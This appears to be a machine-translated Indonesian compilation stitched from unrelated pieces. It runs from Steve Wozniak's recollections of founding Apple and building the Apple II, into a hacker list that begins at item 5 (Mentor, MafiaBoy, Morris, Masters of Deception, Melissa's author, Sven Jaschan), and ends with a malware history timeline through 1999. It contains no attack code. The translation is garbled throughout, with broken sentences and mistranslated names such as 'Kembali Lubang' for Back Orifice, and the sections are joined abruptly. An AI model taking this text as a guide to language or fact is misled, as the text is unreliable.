Apple datang sekitar dari beberapa anak-anak dengan ide membangun sebuah produk yang murah sedikit, mencoba untuk elang itu, menemukan penjualan, dan melangkah ke sihir. Aku datang dari sebuah kelompok yang adalah apa yang Anda sebut beatniks atau hippie-banyak teknisi yang berbicara radikal tentang sebuah revolusi dalam informasi dan bagaimana kita akan benar-benar mengubah dunia dan menempatkan komputer di rumah.Jika orang-orang yang pintar dalam bisnis telah melihat kami dalam kategori komputer kecil dan berpikir Apple akan menjadi perusahaan besar, mereka akan memulai sesuatu di dalam perusahaan mereka. Mike Markkula mengatakan kepada kami sebuah perusahaan seperti Apple-a, perusahaan kecil baru yang baru mulai up-bisa masuk dan berpegang pada sejumlah pasar dan tumbuh dengan pasar. Dia ternyata benar, tapi pada awalnya saya pikir dia hanya membuat jumlah paling besar mungkin.
Woz dan Jobs tidak benar-benar sendirian dalam mimpi mereka untuk menciptakan sebuah revolusi komputer. Dua perusahaan, IMSAI dan Altair, menciptakan komputer pada waktu yang sama dengan Apple.
Altair dan IMSAI mendekati dunia seolah-olah ada banyak orang teknis yang akan membeli kit bagian karena mereka tahu bagaimana untuk solder mereka bersama-sama. Itu sangat mudah untuk Altair dan IMSAI untuk menempatkan sekelompok chip dalam tas dan tidak harus belajar bagaimana untuk memproduksi komputer.Toko menginginkan produk yang mereka bisa menjual banyak. Banyak orang-bahkan teknisi-akan berjalan di pintu dan ingin membeli Altair selesai dibangun, sehingga toko akan membeli kit Altair, membangun di ruang belakang, dan menjualnya dengan harga yang sudah dibangun. Kami membayar perusahaan lokal $ 13 per komputer untuk solder semua bagian bagi kita. Mengapa kita harus memberikan kit untuk seorang pelanggan yang akan membuat kesalahan dan memaksanya untuk menghabiskan dua puluh jam solder segala sesuatu bersama-sama ketika kita bisa melakukannya untuk $ 13?
Dengan Apple II, kami melangkah lebih jauh dan mengatakan kepada orang-orang yang mereka bahkan tidak perlu plug-in transformator atau keyboard atau monitor. Itu datang sebagai salah satu kotak yang lengkap, dan satu-satunya masalah adalah mengaitkan itu untuk satu set TV. Ada sebuah perusahaan kedua yang memiliki produk untuk melakukan itu.
Saat itulah terminologi mulai pergi ke arah personal komputer. Personal berarti satu komputer untuk satu orang, tapi ada juga perbedaan antara komputer dan hobi komputer pribadi: komputer hobi adalah kit, dan Anda harus menjadi seorang teknisi. Itu sekelompok lampu biner aneh di atasnya.Sebuah komputer pribadi memiliki keyboard yang Anda bisa mengetik pada, dan output pergi ke TV Anda.

Membangun One Pertama untuk diri-Nya

Woz dirancang Apple II menjadi komputer yang ia ingin memiliki dan mampu untuk membeli. Pengalaman telah mengajarkan kepadanya bahwa ini adalah salah satu cara terbaik untuk desain produk apapun.
Tidak ada riset pasar-tidak ada yang bertanya berapa banyak karakter yang harus ada di layar atau jika Anda harus memiliki mode ini warna.Pendekatan saya adalah untuk melihat chip yang tersedia dan usus-merasakan serangkaian fitur dan kompromi saat aku pergi bersama.Biaya adalah masalah nyata karena saya sedang membangun yang pertama untuk diriku sendiri, dan aku harus bisa membelinya, jadi harus murah. Saya suka hal-hal dengan sangat sedikit chip karena saya menganggap bahwa desain yang baik. Ini keluar jauh lebih ketat daripada jika saya telah diberi satu set spesifikasi, karena saya akan hanya dirancang oleh kekerasan dengan menambahkan pada sirkuit.
Tak lama setelah Apple didirikan, Commodore dan Radio Shack memperkenalkan komputer pribadi yang siap digunakan. Tapi mereka juga segera gagal. (Jangan khawatir tentang jargon Woz gunakan dalam bagian-pesan ini adalah untuk membangun fleksibilitas dan umur panjang menjadi produk.)
Apa yang saya benar-benar membandingkan komputer kita untuk dua komputer lain yang keluar setelah kita, dimaksudkan untuk menjadi prebuilt, komputer siap-to-run. Mereka adalah Pet Commodore dan Radio Shack TRS 80. Mengapa kita menang atas mereka? The Pet dan TRS 80 tidak diupgrade, dan Anda tidak bisa pasang kartu di dalamnya. Kami dapat ditingkatkan menjadi 48 kilobyte RAM [random-access memory]. Setelah Anda sampai ke program spreadsheet, dibutuhkan lebih dari 8K dari RAM, sehingga tidak bisa berjalan di Pet Commodore atau TRS 80, tetapi bisa dijalankan pada Apple II.Alasan mengapa Apple adalah pemenang besar tanggal kembali ke cerita-IBM 360 komputer sebelumnya. Ini disebut-sebut sebagai komputer yang paling sukses sepanjang masa. Ini memiliki arsitektur sehingga sebagai mesin diperluas, setiap program yang pernah ditulis selalu akan lari. Anda tidak harus mengikat diri Anda ke batas pada memori yang lebih pendek dari apa yang Anda mungkin bisa melihat beberapa dekade ke depan. Seorang insinyur harus berpikir, saya tidak ingin mesin saya untuk menjadi usang. Anda harus merasa seperti Anda adalah pemilik, dan ini adalah mesin Anda.

Mengubah dari Guard

Pada tahun 1983, Steve Jobs merekrut John Sculley dari PepsiCo menjadi presiden dan CEO Apple saat Jobs mempertahankan gelar ketua. Hal ini seharusnya menjadi tim Apple untuk masa depan: brilian, teknolog muda dan berpengalaman, manajer profesional. Pada tahun 1985, Sculley digulingkan Jobs.
Steve adalah seorang visioner yang besar, tapi banyak hal-hal yang terjadi pada kami di Apple adalah kecelakaan dan keberuntungan, dan bukan karena kita bisa memikirkan hal-hal dengan benar. Dunia akan masuk ke komputer kecil, dan kami memiliki beberapa produk yang tepat pada waktu yang tepat. Saya pikir Steve merasa bahwa banyak pemikirannya telah menyebabkan dunia untuk masuk ke komputer di tahun ketika mikroprosesor akan biaya $ 5 dan RAM akan biaya $ 5.Gagasan Steve menjalankan perusahaan adalah untuk membangun teknologi terbaik, tetapi pasar kadang-kadang akan memilih teknologi yang lebih buruk pada harga yang lebih tinggi untuk alasan seperti keakraban, mengetahui orang lain yang masuk ke dalamnya, cara pemasaran yang dilakukan, dan penjualan perjanjian. Dia memiliki ide-ide murni nya. Mungkin dia sedang berusaha untuk membangun sebuah mesin untuk dirinya sendiri pada saat kita harus membangun sebuah mesin untuk pelanggan.
Steve adalah sangat, sangat terang-ia mungkin telah menjadi orang tercerdas di Apple, tapi dia tidak menangani orang dengan baik. Dia meninggalkan sentimen buruk di seluruh perusahaan. Saya pikir banyak manajer yang marah atas Steve ingin mengarahkan apa yang mereka lakukan, yang sangat kasar, dan berbicara kepada orang-orang dengan cara yang tidak membuat mereka merasa seperti mereka pintar dan dihormati seperti mereka tidak tahu apa yang mereka lakukan kecuali mereka melakukannya dengan cara-Nya.
Semua ini datang ke John, dan saya pikir dia mulai harus mengambil tindakan untuk menyelamatkan perusahaan. Saya yakin dia akan meninggalkan Steve banyak kebebasan untuk membuat besar, hal-untuk besar melakukan jenis pekerjaan yang ingin ia lakukan-tapi John harus menyelamatkan perusahaan dan mendapatkan beberapa hal yang dilakukan. Saya pikir Steve merasa bahwa ia tidak bisa melakukan hal-hal besar untuk dunia di Apple dan bahwa dia harus pergi ke luar dari Apple.

Membuat Ini

Ketika Apple melakukan penawaran saham publik, Woz membuat beberapa ratus juta dolar. Setelah merenungkan hal ini, bagaimanapun, dia menyadari bahwa dia telah "berhasil" jauh sebelum Apple go public.
Sehingga finansial membuat itu. Orang-orang mungkin mengatakan mereka berhasil jika mereka mencapai sesuatu yang mereka benar-benar ingin untuk mencapai, tetapi jika Anda berhasil dalam mencapai apa yang Anda inginkan untuk mencapai dan tidak memiliki kesuksesan finansial, saya tidak tahu apakah Anda bisa mengatakan Anda berhasil.Mungkin [ berubah pikiran ] baik ketenaran atau keberuntungan yang membuatnya. Anda bisa, dengan kata lain, menjadi seorang pendidik dan menjadi sangat terkenal karena apa yang Anda lakukan. Anda bisa menyebut ini membuatnya, karena ke mana pun Anda pergi, orang akan berkata, "Aku mendengar pidato Anda," "Aku mendengar seminar Anda," "Aku benar-benar setuju dengan poin Anda," dan "Saya pikir Anda telah melakukan hal yang besar dengan proyek ini. " Mungkin Anda tidak membuat uang, tapi Anda masih bisa mengatakan Anda membuatnya.
Aku punya kebahagiaan saya sebelum saya punya uang. Saya memiliki seluruh besar intern agama-ada gereja atau apa-tapi seluruh baris pikiran dan filsafat tentang bagaimana menjalani hidup dan bagaimana menjadi bahagia selamanya. Aku punya yang turun. Saya adalah, orang yang murni nyata sehat. Aku tidak pernah menggunakan obat-obatan atau mengisap ganja atau sesuatu seperti itu. Aku bahkan tidak pernah minum anggur sampai aku tiga puluh.
Sejak pensiun dari Apple, Woz telah mulai beberapa perusahaan, tapi sebagian besar dia telah melakukan hal-hal filantropis seperti mengajar kelas lima cara menggunakan komputer, menyumbangkan laboratorium komputer ke sekolah-sekolah, dan menyediakan dana untuk organisasi nirlaba.
Saya melakukan apa yang saya dibesarkan diajarkan benar. Saya membaca buku-buku untuk anak-anak saya, dan semua buku ada orang baik yang melakukan hal-hal untuk orang lain-Goofy memenangkan perlombaan besar atas Big Bad Pete, dan ia memberikan uang yang dia memenangkan untuk membangun sebuah berlian bisbol untuk anak yatim. Jika Anda cukup beruntung untuk menjadi sukses, kemudian mencoba untuk melakukan sesuatu untuk membantu komunitas Anda.

Kehidupan setelah Apple

Banyak pengusaha mengalami kesulitan menyerahkan kendali perusahaan yang mereka ciptakan-sebagian karena perusahaan mereka menjadi mereka hidup dan sebagian karena mereka berpikir tidak ada yang bisa melakukan pekerjaan serta mereka bisa. Tidak Woz.
Itu sampai ke titik di mana ada cukup insinyur, jadi aku hanya insinyur lain, dan aku tidak benar-benar penting. Saya akan berbicara dengan pers lebih dari apa pun, jadi aku pergi ke bos saya satu hari dan telah dia menurunkan gaji saya di bawah insinyur yang melakukan pekerjaan yang sebenarnya.Juga, aku punya anak-anak saya dan keluarga. Aku punya enam anak-anak sekarang. Mereka adalah prioritas pertama saya dalam hidup. Tidak ada cara di dunia ini aku bisa menjadi seorang insinyur dan mengambil semua waktu ini jauh dari keluarga saya. Anak-anak berarti banyak bagi saya karena hal yang saya diajarkan sebagai anak-tentang betapa hebatnya kami-dan kenangan yang baik dari apa yang menyenangkan itu adalah untuk bermain dan menjadi anak-anak.
Di kelas enam, saya memutuskan saya akan menjadi seorang insinyur, dan kemudian saya akan menjadi seorang guru sekolah dasar. Itulah yang telah saya lakukan. Aku bisa memiliki banyak bersenang-senang di Apple dan telah terlibat dalam beberapa hal-hal besar yang terjadi di dunia, tapi aku benar-benar merasa lebih baik tentang apa yang saya lakukan.
Tampaknya Woz memiliki kehidupan semua tahu: merancang produk yang Anda cintai, membuat banyak uang, pensiun muda, dan melakukan sesuatu bagi orang-orang.
Temukan sesuatu yang Anda pandai, bekerja di atasnya, dan akhirnya Anda dapat berhasil dan membuat hidup Anda. Jangan hanya mengendur dan berpikir Anda hanya akan menjalani hidup melakukan pekerjaan. Anda harus mencoba untuk melakukan hal yang luar biasa-menempatkan banyak jam untuk membuat banyak hal yang sangat, sangat baik.Ketika Anda masih muda, melewati sekelompok pihak dan hanya tinggal sampai larut malam bekerja pada program-program dan teknologi. Jika Anda memulai di sebuah perusahaan, menghabiskan jam tambahan. Berbicara dengan orang dan mendapatkan laporan yang tepat. Anda memiliki banyak waktu luang ketika Anda masih muda, sehingga memasukkannya ke dalam apa yang Anda pandai sebelum Anda angin dengan kehidupan dengan banyak komitmen, pertemuan, tagihan, dan hipotik. Menghabiskan waktu ketika Anda masih muda, dan yang akan memberi Anda lebih banyak kebebasan ketika Anda lebih tua.
Saya ingin dikenang sebagai desainer komputer yang baik yang merancang hal-hal dengan sangat sedikit bagian dan menulis kode yang sangat menakjubkan dan rumit dan cerdik. Saya ingin dikenang sebagai seorang ayah yang baik yang peduli tentang anak-anak. Setiap langkah hidup saya telah luar biasa. Saya memiliki banyak kebebasan. Saya bisa melakukan banyak perjalanan dan melihat banyak hal. Aku punya anak yang menakjubkan. Tak seorang pun bisa memiliki kehidupan yang lebih baik daripada saya.


5. Loyd Blankenship
Juga dikenal sebagai The Mentor, Blankenship adalah anggota dari beberapa kelompok elite hacker di tahun 1980-an - terutama Legion Of Doom, yang berjuang untuk supremasi online terhadap Masters Of Deception. Namun, klaim yang terbesar untuk ketenaran adalah bahwa ia adalah penulis Manifesto Hacker (The Conscience of Hacker), yang ia tulis setelah ia ditangkap pada tahun 1986. Manifesto menyatakan bahwa hanya kejahatan hacker adalah rasa ingin tahu dan melihat tidak hanya panduan moral hacker sampai hari ini, tetapi juga landasan filosofi hacker. Hal itu dicetak ulang dalam majalah Phrack, dan bahkan membuat jalan ke 1995 Hacker film yang dibintangi Angelina Jolie.
6. Michael Calce
Calce menjadi terkenal ketika ia baru berusia 15 tahun oleh hacking ke beberapa situs komersial terbesar di dunia. Pada Hari Valentine tahun 2000, menggunakan alias hacker MafiaBoy, Calce meluncurkan serangkaian serangan denial-of-service serangan di 75 komputer di 52 jaringan, yang mempengaruhi situs seperti eBay, Amazon dan Yahoo. Ia ditangkap setelah ia melihat membual tentang hack di ruang chat online.Dia menerima hukuman delapan bulan "tahanan terbuka," satu tahun masa percobaan, penggunaan terbatas dari internet, dan denda kecil.
7. Robert Tappan Morris
Pada bulan November 1988 virus komputer, yang kemudian ditelusuri ke Cornell University, menginfeksi sekitar 6,000 mesin Unix utama, memperlambat mereka turun ke titik yang tidak dapat digunakan dan menyebabkan jutaan dolar dalam kerusakan. Apakah virus ini adalah yang pertama dari jenisnya masih bisa diperdebatkan. Apa catatan publik, bagaimanapun, adalah bahwa penciptanya, Robert Tappan Morris, menjadi orang pertama yang dihukum di bawah Penipuan dan Penyalahgunaan Komputer Undang-Undang. Morris mengatakan nya 'worm' virus tidak dimaksudkan untuk merusak apa-apa dan malah dirilis untuk mengukur ukuran internet. Pernyataan ini tidak membantu dia, bagaimanapun, dan ia dijatuhi hukuman tiga tahun masa percobaan, 4000 jam pelayanan masyarakat dan denda besar dan kuat. Sebuah disk komputer yang berisi kode sumber untuk Worm Morris tetap dipajang di Boston Museum of Science sampai hari ini.
8. The Masters Of Deception
The Masters Of Deception (MoD) adalah kelompok berbasis di New York hacker elite yang ditargetkan sistem telepon AS di pertengahan hingga akhir 80-an. Sebuah kelompok sempalan dari Legion Of Doom (LOD), mereka menjadi target untuk pihak berwenang setelah mereka masuk ke sistem komputer AT & T. Kelompok ini akhirnya dibawa ke tumit pada tahun 1992 dengan banyak anggotanya menerima penjara atau hukuman ditangguhkan.
9. David L. Smith
David L. Smith membuat nama untuk dirinya sendiri menciptakan virus Melissa.
Smith adalah penulis terkenal Melissa worm virus, yang pertama sukses email-sadar virus didistribusikan dalam kelompok diskusi Usenet alt.seks. Bentuk asli virus dikirim melalui email. Smith ditangkap dan kemudian dihukum penjara karena menyebabkan lebih dari $ 80 juta nilai kerusakan.
Pada awal tahun 1999, usia e-mail bersalah berakhir dengan penciptaan Melissa worm virus. Melissa makro massa-mail virus itu, legenda, bernama setelah stripper disukai oleh Smith. Virus ini akan membaca buku alamat klien dan mengirim tumpukan email bersama dengan membaca header "Berikut adalah dokumen yang Anda minta ..." menyumbat jaringan komputer hari. Link di e-mail menyebabkan berbagai situs porno. Melissa pergi untuk mengilhami beberapa virus peniru. Smith mengaku bersalah atas tuduhan aktivitas berbahaya pada akhir tahun 1999, dan menjabat 20 bulan. Setelah penangkapannya, Smith pergi menyamar untuk membantu FBI dalam pelacakan produsen virus lainnya.
10. Sven Jaschan
Jaschan dinyatakan bersalah menulis Netsky dan Sasser worm pada 2004 saat ia masih remaja. Virus yang ditemukan bertanggung jawab atas 70 persen dari semua malware terlihat menyebar melalui internet pada saat itu. Jaschan menerima hukuman percobaan dan tiga tahun masa percobaan atas kejahatannya. Dia juga disewa oleh sebuah perusahaan keamanan.


Bahan Reperensi :

Kisah malware

Kisah  malware
Berikut adalah garis waktu yang sangat singkat kapan dan bagaimana terobosan penting yang dibuat di dunia berbahaya dari malware. Banyaknya virus mematikan, worm dan Trojan yang kita lihat di sekitar kita saat ini adalah produk dari bertahun-tahun penelitian dan progresif perkembangan.

Konten Jump:

  • 1949
  • Tahun 1980-an
  • Tahun 1990-an

1949
Para peneliti di bidang ini mengembangkan teori pertama dan kode untuk program replikasi diri.

Tahun 1980-an

Virus pertama di alam liar muncul menjadi bahkan sebelum karya eksperimental yang mendefinisikan virus hari ini. Didirikan pada sistem operasi Apple II, itu tersebar di disket Apple II yang berisi sistem operasi.
1981 - Virus pertama kali terkena alam liar
1983 - Pertama didokumentasikan virus eksperimental
Fred Cohen melakukan penelitian menyeluruh dan menyampaikan laporan tentang kemungkinan dan implikasi dari virus komputer. Ini adalah kutipan dari makalahnya.
Pada tanggal 3 November 1983, virus pertama dipahami sebagai percobaan untuk dipresentasikan pada seminar mingguan pada keamanan komputer. Konsep ini pertama kali diperkenalkan pada seminar ini oleh penulis, dan nama 'virus' yang dipikirkan oleh Len Adleman. Setelah 8 jam kerja ahli pada berat dimuat VAX 11/750 menjalankan sistem Unix, virus pertama telah selesai dan siap untuk demonstrasi. Dalam seminggu, izin diperoleh untuk melakukan eksperimen, dan 5 Percobaan dilakukan. Pada tanggal 10 November, virus itu ditunjukkan dengan seminar keamanan. "
Singkatnya, realitas dan potensi virus komputer menjadi jelas untuk pertama kalinya.
1984 - definisi Fred Cohen dari virus
Fred Cohen mendefinisikan virus komputer sebagai "sebuah program komputer yang dapat mempengaruhi program komputer lain dengan memodifikasi mereka sedemikian rupa untuk menyertakan (mungkin berevolusi) salinan dari dirinya sendiri."
1986 - Otak & Virdem
MalwareDua warga Pakistan bernama Basit dan Amjad menggantikan kode dieksekusi di sektor boot dari sebuah floppy disk dengan kode mereka sendiri. Mereka telah mengembangkan metode menginfeksi dengan virus mereka dijuluki "Brain". Hal itu dimaksudkan untuk menginfeksi setiap floppy 360KB diakses pada setiap drive dan menyebar begitu luas pada sistem PC populer MS-DOS yang biasanya disebut virus komputer pertama. Ini terlepas dari fakta bahwa percobaan Cohen dan virus Apple II datang lebih awal. Semua disket yang terinfeksi telah "© Brain" untuk label volume. Pertama file virus, Virdem, juga dibuat tahun ini.
Worm file infector Virus, Lehigh, & Natal - 1987
Virus file pertama mulai muncul sekitar waktu ini. Virus ini paling terkonsentrasi pada file COM, COMMAND.COM pada khususnya. The Lehigh virus sering dilaporkan menjadi yang pertama ini untuk menginfeksi COMMAND.COM. Pekerjaan lain yang dilakukan untuk menciptakan EXE infector pertama: Suriv-02 (Suriv adalah Virus mundur). Virus ini akhirnya berkembang menjadi virus Yerusalem terkenal. Selama waktu ini, cepat-penyebaran (500.000 ulangan per jam) cacing disebut Worm IBM Natal memukul mainframe IBM dan menyebabkan kerusakan besar.
1988 - Yerusalem, MacMag & Internet Worm
Yerusalem, salah satu virus yang paling umum yang ada, telah dilepaskan pada saat ini. Hal ini diaktifkan setiap hari Jumat 13 th dan mempengaruhi baik EXE. Dan. File COM, menghapus semua program berjalan pada hari itu.
Umumnya dianggap pertama virus Macintosh, MacMag adalah Hypercard tumpukan virus pada Macintosh.
The Internet Worm (Robert Morris 'penciptaan) menyebabkan krisis internet besar pertama dan menutup banyak komputer.
1989 - AIDS Trojan
Dibuat sekitar waktu ini, Trojan ini terkenal untuk benar-benar memegang data yang sandera. Dikirim keluar dengan kedok program informasi AIDS, Trojan mengenkripsi hard drive pengguna, mencegah dia akses untuk itu dan menuntut pembayaran untuk kunci dekripsi atau password.

1990 - Anti-virus dan Virus Efek BBS
Diluncurkan oleh Symantec, Norton AntiVirus adalah salah satu program anti-virus pertama kali dikembangkan oleh sebuah perusahaan besar.
Pertukaran virus pertama yang disebut (VX) BBS pergi online di Bulgaria,. Ide-ide dan kode sekarang dapat dipertukarkan secara bebas sebagai hasilnya.
1991 - Tequila
Dibuat di Swiss, Tequila adalah yang pertama luas virus polimorfik: itu mengubah penampilan dengan setiap infeksi baru dalam upaya untuk menghindari deteksi dan penetralan.
1992 - Michelangelo, DAME, & Virus Laboratorium Penciptaan
Ada peningkatan 420% besar dalam jumlah virus yang ada dari tahun 1991. Sebuah peringatan di seluruh dunia keluar dengan klaim bahwa kerusakan besar akan terjadi di seluruh dunia selama beberapa tahun ke depan. Pada kenyataannya, tidak ada yang terjadi. The Michelangelo menakut-nakuti memperkirakan bahwa 5 juta komputer akan crash pada tanggal 6 Maret. Hanya 5.000-10.000 benar-benar turun. 
Tidak semuanya baik-baik, namun. The Dark Avenger Mutasi Mesin (DAME) diciptakan pada saat ini dan menjadi toolkit pertama kali digunakan oleh pencipta virus untuk mengubah kreasi mereka menjadi virus polimorfik.
Virus Laboratorium Penciptaan (VCL) menjadi yang pertama sebenarnya kit penciptaan virus pada tahun yang sama.Membuat virus tidak lagi sesulit dulu sebagai akibat dari ini.
Email Good Times - 1994
Tipuan ini menciptakan gelombang di seluruh komunitas komputer. Ini memperingatkan pengguna untuk tidak membuka email yang berjudul "Good Times" sebagai virus akan mengaktifkan saat membuka dan menghapus seluruh hard drive.
1995 - Tahun Hacker & Virus makro pertama
Ini adalah tanpa diragukan lagi tahun hacker. Pada sekitar waktu yang sama, Griffith Air Force Base, NASA, Goddard Space Flight Center, Korea Penelitian Atom Institute, dan Jet Propulsion Laboratory semua terkena hacker. Pada Thanksgiving, GE, IBM, Pipa dan perusahaan lain yang semua terkena "Internet Liberation Front".
Concept, virus macro pertama yang menyerang Microsoft Word, juga dikembangkan.
1996 - Boza, Laroux, & Staog
Boza adalah virus pertama yang dirancang untuk khusus untuk korup Windows 95 file.
Ditulis pada saat ini, Staog adalah virus pertama yang menyerang file Linux dan itu ditulis oleh kelompok yang sama yang menulis Boza.
1998 - Kembali Lubang
Back Orifice adalah Trojan pertama yang dirancang untuk memungkinkan pengirim untuk mendapatkan kontrol penuh atas komputer yang terkena melalui internet.
1999 - Melissa & bubbleboy
Sebuah virus yang sangat terkenal, Melissa adalah kombinasi pertama Microsoft Word virus makro dan worm untuk menggunakan kedua Outlook dan buku alamat Outlook Express untuk mengirim sendiri kepada orang lain melalui email. Hal ini mampu meneruskan sendiri untuk setiap 50 orang yang tercantum dalam buku alamat Outlook korban. Virus ini juga menginfeksi dokumen Word lain dan kemudian mail mereka keluar sebagai lampiran.
Bubbleboy adalah worm pertama yang akan mengaktifkan segera setelah pengguna hanya membuka pesan email di Microsoft Outlook atau hanya pratinjau pesan dalam Outlook Express. Tidak ada kebutuhan untuk melampirkan file.

Referensi
Sejarah Berbahaya Program
http://www.viruslist.com/en/viruses/encyclopedia?chapter=153280684
Kisah Malware Mengejutkan
http://www.1st-in-antivirus.com/malware-history.htm
Sejarah Virus
http://www.cknow.com/vtutor/vthistory.htm